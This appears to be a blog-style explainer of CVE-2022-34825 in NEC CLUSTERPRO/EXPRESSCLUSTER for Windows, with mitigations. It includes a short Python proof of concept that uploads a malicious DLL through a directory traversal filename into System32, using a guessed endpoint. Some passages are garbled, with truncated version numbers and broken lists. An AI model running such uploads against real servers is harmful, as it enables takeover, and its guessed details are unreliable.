CVE-2022-34825 - Uncontrolled Search Path Element in CLUSTERPRO X and EXPRESSCLUSTER X for Windows Explained

In summer 2022, a critical vulnerability was disclosed with the identifier CVE-2022-34825. This flaw affected several disaster recovery and clustering products for Windows made by NEC: CLUSTERPRO X 5. and earlier, EXPRESSCLUSTER X 5. and earlier, and their SingleServerSafe variants. If you run or manage any of these, you need to pay attention—remote unauthenticated attackers can leverage this bug to overwrite files on your server and possibly run their own code. Let’s break it down in simple terms, walk through how someone might exploit this, and look at how you can stay protected.

What is CVE-2022-34825?

At its core, CVE-2022-34825 is an "Uncontrolled Search Path Element" vulnerability. This vulnerability basically means that the software looks for critical executable files or DLLs in the wrong places—or doesn’t check the search path safely. This oversight allows an attacker to place a malicious file in one of these locations, tricking the application into executing it.

But in this specific case, things are even worse: a remote, unauthenticated attacker (someone on your network, no login needed) can overwrite files anywhere on your Windows machine, including potentially key operating system files or application binaries. From there, they could possibly execute arbitrary code with the privileges of the affected service—usually SYSTEM or Administrator.

EXPRESSCLUSTER X 5. SingleServerSafe for Windows and earlier

Full details: NEC Security Advisory (Japanese)

A Simple View

The application uses external resources (like DLLs or config files) stored in directories such as C:\Program Files\NEC\CLUSTERPRO\, but it doesn't strictly control its search path, nor does it properly sanitize filenames. An attacker can send crafted requests to the vulnerable service, tricking it into writing files to chosen locations—even overwriting existing system files.

Overwriting any file on the system.

2. Triggering execution of planted malicious code (if the attacker can control both location and file content).

Example Exploit (Simplified)

> Disclaimer: This is a simplified example for educational purposes only. Testing against any system you do not own is illegal.

Assume the target exposes a vulnerable HTTP or RPC interface on port 29003 (default for EXPRESSCLUSTER). An attacker can upload a crafted DLL file to a sensitive location; for instance, replacing an important DLL in the application’s path.

Here’s a simplified Python snippet showing how a malicious DLL could be sent

import requests

# Target server details
target_ip = '192.168.1.100'
target_port = 29003

# Path to the malicious DLL (attacker must prepare this beforehand)
malicious_dll = b'MZ...'  # Malicious content starting with 'MZ' (DLL magic bytes)

# API endpoint (example, adjust path as needed)
upload_url = f'http://{target_ip}:{target_port}/vulnerable_upload';

# The directory traversal payload to overwrite an important DLL file
payload = {
    'file': ('..\\..\\Windows\\System32\\evil.dll', malicious_dll)
}

# Send the malicious file to the server
res = requests.post(upload_url, files=payload)

if res.status_code == 200:
    print("[+] DLL uploaded successfully!")
else:
    print("[-] Upload failed:", res.text)

Note: The actual endpoint and parameter names will depend on the product configuration and version. The core idea is to abuse the lack of input validation, using directory traversal (..\\) to place a crafted file elsewhere on the server.

What Could an Attacker Achieve?

- Overwrite critical system files (DLLs/executables)

On next application restart or Windows boot, malicious code executes

- Take over the server—read, change, or delete data, install malware, or use the server as a beachhead into the whole network

Update Now. NEC released patches and fixed versions. Get the latest software from

- NEC CLUSTERPRO/EXPRESSCLUSTER Download Center (Japanese)

Reach out to your NEC representative for assistance if you need help updating.

2. Restrict Access. Block network access to CLUSTERPRO/EXPRESSCLUSTER management ports from untrusted networks (use a firewall, segmentation, VPN, etc).

3. Monitor for Changes. Use endpoint protection solutions and SIEM tools to look for suspicious file changes in your cluster software folders.

4. Audit Regularly. Review which services run with high privileges and keep software and Windows patched.

Original References

- NEC Security Advisory N22-015
- JVN#92382551: Uncontrolled Search Path Element in CLUSTERPRO/EXPRESSCLUSTER
- NIST CVE Summary - CVE-2022-34825

Conclusion

CVE-2022-34825 is a serious flaw affecting popular cluster/HA solutions for Windows. Anyone running CLUSTERPRO or EXPRESSCLUSTER X 5. (or earlier) should patch immediately and check for indicators of compromise. Attackers don’t need a password—only network access—to potentially take control of your server. By acting now, you can avoid being the next victim.

Timeline

Published on: 11/08/2022 22:15:00 UTC
Last modified on: 11/09/2022 16:31:00 UTC